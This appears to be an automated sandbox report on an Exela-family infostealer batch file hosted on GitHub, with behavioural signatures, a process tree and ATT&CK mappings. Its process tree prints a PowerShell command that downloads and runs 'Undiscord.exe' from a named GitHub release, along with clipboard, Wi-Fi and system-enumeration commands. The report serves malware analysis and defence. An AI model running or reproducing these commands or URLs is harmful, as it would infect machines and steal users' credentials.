Overview

overview

10

Static

static

1

URLScan

urlscan

https://raw.githubus...

windows10-2004-x64

10

Analysis

  • max time kernel
    164s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-07-2024 14:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://raw.githubusercontent.com/lunastealer/Dawa-Stealer/main/setup.bat

Score
10/10
exelastealercollectioncredential_accessdiscoveryevasionexecutionpersistenceprivilege_escalationpyinstallerspywarestealerupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/lunastealer/Discord-Message-Deletor/releases/download/vypix/Undiscord.exe

Signatures

  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

    stealerexelastealer
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

    collection
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 62 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Enumerates processes with tasklist 1 TTPs 5 IoCs
    discovery
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 8 IoCs
    evasion
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 59 IoCs
  • Suspicious use of SendNotifyMessage 57 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/lunastealer/Dawa-Stealer/main/setup.bat
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2352
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc59aa46f8,0x7ffc59aa4708,0x7ffc59aa4718
      2⤵
        PID:3788
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        2⤵
          PID:2020
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3440
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
          2⤵
            PID:2120
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
            2⤵
              PID:4696
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
              2⤵
                PID:3384
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:8
                2⤵
                  PID:2284
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3748
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
                  2⤵
                    PID:4292
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
                    2⤵
                      PID:2324
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
                      2⤵
                        PID:5232
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
                        2⤵
                          PID:5240
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5192 /prefetch:2
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5692
                      • C:\Windows\System32\CompPkgSrv.exe
                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                        1⤵
                          PID:5112
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:4956
                          • C:\Windows\System32\NOTEPAD.EXE
                            "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\StopDeny.bat
                            1⤵
                            • Opens file in notepad (likely ransom note)
                            • Suspicious use of FindShellTrayWindow
                            PID:1616
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\StopDeny.bat" "
                            1⤵
                              PID:5456
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\StopDeny.bat" "
                              1⤵
                                PID:5672
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\StopDeny.bat" "
                                1⤵
                                  PID:5732
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\StopDeny.bat" "
                                  1⤵
                                    PID:5828
                                  • C:\Windows\system32\NOTEPAD.EXE
                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Text Document.txt
                                    1⤵
                                      PID:6008
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\New Text Document.bat" "
                                      1⤵
                                        PID:5036
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell $down=New-Object System.Net.WebClient;$url='https://github.com/lunastealer/Discord-Message-Deletor/releases/download/vypix/Undiscord.exe';$file='Undiscord.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
                                          2⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1448
                                          • C:\Users\Admin\Desktop\Undiscord.exe
                                            "C:\Users\Admin\Desktop\Undiscord.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:5960
                                            • C:\Users\Admin\Desktop\Undiscord.exe
                                              "C:\Users\Admin\Desktop\Undiscord.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:6016
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "ver"
                                                5⤵
                                                  PID:1796
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  5⤵
                                                    PID:812
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      6⤵
                                                      • Detects videocard installed
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5816
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
                                                    5⤵
                                                      PID:1704
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic computersystem get Manufacturer
                                                        6⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1628
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "gdb --version"
                                                      5⤵
                                                        PID:3328
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tasklist"
                                                        5⤵
                                                          PID:5684
                                                          • C:\Windows\system32\tasklist.exe
                                                            tasklist
                                                            6⤵
                                                            • Enumerates processes with tasklist
                                                            PID:5820
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
                                                          5⤵
                                                            PID:5988
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic path Win32_ComputerSystem get Manufacturer
                                                              6⤵
                                                                PID:3492
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                              5⤵
                                                                PID:4424
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic csproduct get uuid
                                                                  6⤵
                                                                    PID:5196
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "tasklist"
                                                                  5⤵
                                                                    PID:2880
                                                                    • C:\Windows\system32\tasklist.exe
                                                                      tasklist
                                                                      6⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:5716
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "tasklist"
                                                                    5⤵
                                                                      PID:4548
                                                                      • C:\Windows\system32\tasklist.exe
                                                                        tasklist
                                                                        6⤵
                                                                        • Enumerates processes with tasklist
                                                                        PID:2300
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2352"
                                                                      5⤵
                                                                        PID:4536
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /F /PID 2352
                                                                          6⤵
                                                                          • Kills process with taskkill
                                                                          PID:440
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3788"
                                                                        5⤵
                                                                          PID:1504
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            taskkill /F /PID 3788
                                                                            6⤵
                                                                            • Kills process with taskkill
                                                                            PID:4580
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2020"
                                                                          5⤵
                                                                            PID:2164
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              taskkill /F /PID 2020
                                                                              6⤵
                                                                              • Kills process with taskkill
                                                                              PID:4972
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3440"
                                                                            5⤵
                                                                              PID:3352
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                taskkill /F /PID 3440
                                                                                6⤵
                                                                                • Kills process with taskkill
                                                                                PID:644
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2120"
                                                                              5⤵
                                                                                PID:184
                                                                                • C:\Windows\system32\taskkill.exe
                                                                                  taskkill /F /PID 2120
                                                                                  6⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:2848
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3384"
                                                                                5⤵
                                                                                  PID:5788
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    taskkill /F /PID 3384
                                                                                    6⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:2568
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5232"
                                                                                  5⤵
                                                                                    PID:5792
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      taskkill /F /PID 5232
                                                                                      6⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:3484
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5240"
                                                                                    5⤵
                                                                                      PID:4404
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        taskkill /F /PID 5240
                                                                                        6⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:5172
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                      5⤵
                                                                                        PID:1876
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          cmd.exe /c chcp
                                                                                          6⤵
                                                                                            PID:5592
                                                                                            • C:\Windows\system32\chcp.com
                                                                                              chcp
                                                                                              7⤵
                                                                                                PID:5388
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                            5⤵
                                                                                              PID:2300
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                cmd.exe /c chcp
                                                                                                6⤵
                                                                                                  PID:4716
                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                    chcp
                                                                                                    7⤵
                                                                                                      PID:4268
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                  5⤵
                                                                                                    PID:3732
                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                      tasklist /FO LIST
                                                                                                      6⤵
                                                                                                      • Enumerates processes with tasklist
                                                                                                      PID:3884
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                    5⤵
                                                                                                    • Clipboard Data
                                                                                                    PID:3800
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell.exe Get-Clipboard
                                                                                                      6⤵
                                                                                                      • Clipboard Data
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:4644
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                                    5⤵
                                                                                                    • Network Service Discovery
                                                                                                    PID:964
                                                                                                    • C:\Windows\system32\systeminfo.exe
                                                                                                      systeminfo
                                                                                                      6⤵
                                                                                                      • Gathers system information
                                                                                                      PID:4896
                                                                                                    • C:\Windows\system32\HOSTNAME.EXE
                                                                                                      hostname
                                                                                                      6⤵
                                                                                                        PID:5284
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic logicaldisk get caption,description,providername
                                                                                                        6⤵
                                                                                                        • Collects information from the system
                                                                                                        PID:5296
                                                                                                      • C:\Windows\system32\net.exe
                                                                                                        net user
                                                                                                        6⤵
                                                                                                          PID:3384
                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                            C:\Windows\system32\net1 user
                                                                                                            7⤵
                                                                                                              PID:1172
                                                                                                          • C:\Windows\system32\query.exe
                                                                                                            query user
                                                                                                            6⤵
                                                                                                              PID:4240
                                                                                                              • C:\Windows\system32\quser.exe
                                                                                                                "C:\Windows\system32\quser.exe"
                                                                                                                7⤵
                                                                                                                  PID:460
                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                net localgroup
                                                                                                                6⤵
                                                                                                                  PID:5996
                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                    C:\Windows\system32\net1 localgroup
                                                                                                                    7⤵
                                                                                                                      PID:1808
                                                                                                                  • C:\Windows\system32\net.exe
                                                                                                                    net localgroup administrators
                                                                                                                    6⤵
                                                                                                                      PID:4516
                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                        C:\Windows\system32\net1 localgroup administrators
                                                                                                                        7⤵
                                                                                                                          PID:4144
                                                                                                                      • C:\Windows\system32\net.exe
                                                                                                                        net user guest
                                                                                                                        6⤵
                                                                                                                          PID:5372
                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                            C:\Windows\system32\net1 user guest
                                                                                                                            7⤵
                                                                                                                              PID:4972
                                                                                                                          • C:\Windows\system32\net.exe
                                                                                                                            net user administrator
                                                                                                                            6⤵
                                                                                                                              PID:2164
                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                C:\Windows\system32\net1 user administrator
                                                                                                                                7⤵
                                                                                                                                  PID:1320
                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                wmic startup get caption,command
                                                                                                                                6⤵
                                                                                                                                  PID:5444
                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                  tasklist /svc
                                                                                                                                  6⤵
                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                  PID:4724
                                                                                                                                • C:\Windows\system32\ipconfig.exe
                                                                                                                                  ipconfig /all
                                                                                                                                  6⤵
                                                                                                                                  • Gathers network information
                                                                                                                                  PID:400
                                                                                                                                • C:\Windows\system32\ROUTE.EXE
                                                                                                                                  route print
                                                                                                                                  6⤵
                                                                                                                                    PID:4696
                                                                                                                                  • C:\Windows\system32\ARP.EXE
                                                                                                                                    arp -a
                                                                                                                                    6⤵
                                                                                                                                    • Network Service Discovery
                                                                                                                                    PID:4940
                                                                                                                                  • C:\Windows\system32\NETSTAT.EXE
                                                                                                                                    netstat -ano
                                                                                                                                    6⤵
                                                                                                                                    • System Network Connections Discovery
                                                                                                                                    • Gathers network information
                                                                                                                                    PID:644
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc query type= service state= all
                                                                                                                                    6⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:2520
                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                    netsh firewall show state
                                                                                                                                    6⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                    PID:5164
                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                    netsh firewall show config
                                                                                                                                    6⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                    PID:4392
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                                                                  5⤵
                                                                                                                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                  PID:4180
                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                    netsh wlan show profiles
                                                                                                                                    6⤵
                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                    • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                    PID:3552
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                  5⤵
                                                                                                                                    PID:424
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic csproduct get uuid
                                                                                                                                      6⤵
                                                                                                                                        PID:1104
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                      5⤵
                                                                                                                                        PID:3372
                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                          wmic csproduct get uuid
                                                                                                                                          6⤵
                                                                                                                                            PID:416
                                                                                                                                • C:\Users\Admin\Desktop\Undiscord.exe
                                                                                                                                  "C:\Users\Admin\Desktop\Undiscord.exe"
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2312
                                                                                                                                  • C:\Users\Admin\Desktop\Undiscord.exe
                                                                                                                                    "C:\Users\Admin\Desktop\Undiscord.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:1520
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                      3⤵
                                                                                                                                        PID:5396
                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                    1⤵
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                    PID:228

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                  Reconnaissance

                                                                                                                                  Resource Development

                                                                                                                                  Initial Access

                                                                                                                                  Execution

                                                                                                                                  Command and Scripting Interpreter

                                                                                                                                  2
                                                                                                                                  T1059

                                                                                                                                  PowerShell

                                                                                                                                  1
                                                                                                                                  T1059.001

                                                                                                                                  Persistence

                                                                                                                                  Account Manipulation

                                                                                                                                  1
                                                                                                                                  T1098

                                                                                                                                  Create or Modify System Process

                                                                                                                                  1
                                                                                                                                  T1543

                                                                                                                                  Windows Service

                                                                                                                                  1
                                                                                                                                  T1543.003

                                                                                                                                  Event Triggered Execution

                                                                                                                                  1
                                                                                                                                  T1546

                                                                                                                                  Netsh Helper DLL

                                                                                                                                  1
                                                                                                                                  T1546.007

                                                                                                                                  Privilege Escalation

                                                                                                                                  Account Manipulation

                                                                                                                                  1
                                                                                                                                  T1098

                                                                                                                                  Create or Modify System Process

                                                                                                                                  1
                                                                                                                                  T1543

                                                                                                                                  Windows Service

                                                                                                                                  1
                                                                                                                                  T1543.003

                                                                                                                                  Event Triggered Execution

                                                                                                                                  1
                                                                                                                                  T1546

                                                                                                                                  Netsh Helper DLL

                                                                                                                                  1
                                                                                                                                  T1546.007

                                                                                                                                  Defense Evasion

                                                                                                                                  Impair Defenses

                                                                                                                                  1
                                                                                                                                  T1562

                                                                                                                                  Disable or Modify System Firewall

                                                                                                                                  1
                                                                                                                                  T1562.004

                                                                                                                                  Credential Access

                                                                                                                                  Credentials from Password Stores

                                                                                                                                  1
                                                                                                                                  T1555

                                                                                                                                  Credentials from Web Browsers

                                                                                                                                  1
                                                                                                                                  T1555.003

                                                                                                                                  Unsecured Credentials

                                                                                                                                  1
                                                                                                                                  T1552

                                                                                                                                  Credentials In Files

                                                                                                                                  1
                                                                                                                                  T1552.001

                                                                                                                                  Discovery

                                                                                                                                  Browser Information Discovery

                                                                                                                                  1
